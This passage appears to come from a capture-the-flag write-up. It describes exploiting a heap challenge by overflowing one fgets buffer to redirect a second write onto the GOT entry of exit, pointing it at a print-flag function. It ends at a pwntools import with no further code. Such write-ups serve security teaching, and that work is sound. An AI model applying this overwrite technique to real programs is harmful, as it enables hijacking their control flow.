malloc four chunks as the figure shown above. The first and the third chunks contain a pointer to the second and the fourth chunks respectively. Then, it will invoke two
fgets to these two pointers. We can make use of the buffer overflow bug of the first
fgets to change the destination of the second
fgets. By changing the value of the GOT of
exit to the embedded print-flag function, we can get the flag easily.
from pwn import *